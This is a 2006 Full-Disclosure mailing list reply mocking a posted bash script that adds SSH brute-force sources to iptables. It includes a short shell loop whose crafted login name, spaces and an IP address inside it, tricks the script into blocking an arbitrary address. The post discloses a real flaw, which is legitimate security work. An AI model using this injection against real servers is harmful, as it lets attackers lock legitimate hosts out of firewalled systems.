[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- To: "GroundZero Security" <fd@xxxxxxx>
- Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- From: "Gary Leons" <tastytastybeef@xxxxxxxxxxxxxx>
- Date: Tue, 28 Feb 2006 22:52:52 +0100
On 2/28/06, GroundZero Security <fd@xxxxxxx> wrote:
> Hello,
>
> i made a small bash script last year to block those bruteforce attempts
> automatically via the firewall.
> In case someone is interested, i released it on our website. Someone may have
> a use for it :-)
> http://www.groundzero-security.com/code/bruteforce-block.sh
> Have a nice day everyone!
>
> -sk
That is remarkably shoddy coding from a "security research and
software developer".
*NEWS FLASH* most platforms allow login names to contain spaces.
$ for ((i=0;i<5;i++));
> do ssh -l "j00 ar3 l4m3 222.173.190.239" idiot.running.this.script.com
> done
And i just added an arbitrary address to your firewall, fun!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/